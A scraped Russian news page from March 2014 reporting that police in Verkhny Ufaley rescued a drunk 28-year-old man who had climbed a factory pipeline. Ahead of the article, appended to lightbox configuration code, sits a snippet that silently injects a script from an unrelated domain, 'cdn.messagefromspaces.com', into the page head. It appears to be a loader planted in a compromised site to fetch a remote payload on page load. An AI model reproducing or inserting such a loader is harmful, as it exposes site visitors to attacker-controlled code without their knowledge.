, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Верхнем Уфалее полицейские спасли жизнь перепившему молодому человеку, ловившему «белок» на 10 метровой высоте

Сегодня, 25 марта, в дежурную часть отдела полиции в Верхнем Уфалее поступил звонок о том, что один из местных жителей забрался на трубопровод, находящийся на территории завода металлоизделий, и не может самостоятельно спустится. Стражи порядка немедленно выехали на место происшествия, сообщив об инциденте сотрудникам других экстренных служб.

Полицейским и спасателям удалось спустить незадачливого мужчину на землю. Им оказался 28-летний местный житель. По предварительным данным, после длительного пьянства у парня произошел приступ "белой горячки". Ничего вразумительного он сказать не мог и был доставлен в райотдел для дальнейшего разбирательства.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
20:22 - 25 марта 2014
|
автор: U-RSS
|
(424)
|
(0)

Комментарии (0)

Я человек
Я бот